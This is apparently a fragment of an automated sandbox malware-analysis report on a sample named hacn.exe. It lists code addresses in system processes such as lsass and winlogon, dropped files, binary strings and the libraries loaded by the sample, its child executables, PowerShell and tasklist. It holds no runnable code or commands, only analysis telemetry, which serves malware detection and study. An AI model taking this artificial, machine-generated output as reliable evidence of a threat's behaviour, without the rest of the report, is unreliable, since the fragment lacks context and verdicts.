Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC642B2C	22_2_00000225DC642B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC64DCE0	22_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6544A8	22_2_00000225DC6544A8
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC671F2C	22_2_00000225DC671F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC67D0E0	22_2_00000225DC67D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6838A8	22_2_00000225DC6838A8
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6A2B2C	22_2_00000225DC6A2B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6ADCE0	22_2_00000225DC6ADCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6B44A8	22_2_00000225DC6B44A8
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AB1F2C	26_2_00000202C0AB1F2C
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AC38A8	26_2_00000202C0AC38A8
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0ABD0E0	26_2_00000202C0ABD0E0
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AE2B2C	26_2_00000202C0AE2B2C
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AF44A8	26_2_00000202C0AF44A8
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AEDCE0	26_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A6612D1F2C	29_2_000002A6612D1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A6612DD0E0	29_2_000002A6612DD0E0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A6612E38A8	29_2_000002A6612E38A8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A661302B2C	29_2_000002A661302B2C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66131AEC5	29_2_000002A66131AEC5
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66130DCE0	29_2_000002A66130DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A6613144A8	29_2_000002A6613144A8
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAEFF1F2C	30_2_000002BAAEFF1F2C
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF0038A8	30_2_000002BAAF0038A8
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAEFFD0E0	30_2_000002BAAEFFD0E0
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF022B2C	30_2_000002BAAF022B2C
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF0344A8	30_2_000002BAAF0344A8
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF02DCE0	30_2_000002BAAF02DCE0
Source: C:\Windows\System32\dialer.exe	Code function: 45_2_00007FF7C6D614D8	45_2_00007FF7C6D614D8
Source: C:\Windows\System32\dialer.exe	Code function: 45_2_00007FF7C6D6226C	45_2_00007FF7C6D6226C
Source: C:\Windows\System32\dialer.exe	Code function: 45_2_00007FF7C6D62560	45_2_00007FF7C6D62560
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A8799D0E0	51_2_0000026A8799D0E0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879A38A8	51_2_0000026A879A38A8
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A87991F2C	51_2_0000026A87991F2C
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879CDCE0	51_2_0000026A879CDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879D44A8	51_2_0000026A879D44A8
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879C2B2C	51_2_0000026A879C2B2C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4

Source: C:\Users\user\Desktop\hacn.exe	Code function: String function: 00007FF61D322B30 appears 47 times
Source: C:\Windows\System32\dialer.exe	Code function: String function: 00007FF713F14020 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: String function: 000FEB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: String function: 000FEC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: String function: 000FF5F0 appears 31 times
Source: C:\ProgramData\main.exe	Code function: String function: 00007FFDF7DF5E90 appears 115 times
Source: C:\ProgramData\main.exe	Code function: String function: 00007FFDF7DF4710 appears 98 times
Source: C:\ProgramData\main.exe	Code function: String function: 00007FFDF7DF5C60 appears 241 times

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wxyubnjmnlae.tmp.6.dr	Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: updater.exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: setup.exe.4.dr	Static PE information: Number of sections : 11 > 10

Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs hacn.exe
Source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs hacn.exe
Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs hacn.exe
Source: hacn.exe	Binary or memory string: OriginalFilename vs hacn.exe
Source: hacn.exe, 00000001.00000002.1667137238.00007FFDFB898000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython310.dll. vs hacn.exe
Source: hacn.exe, 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs hacn.exe

Source: C:\Users\user\Desktop\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\main.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: dhcpcsvc6.dll
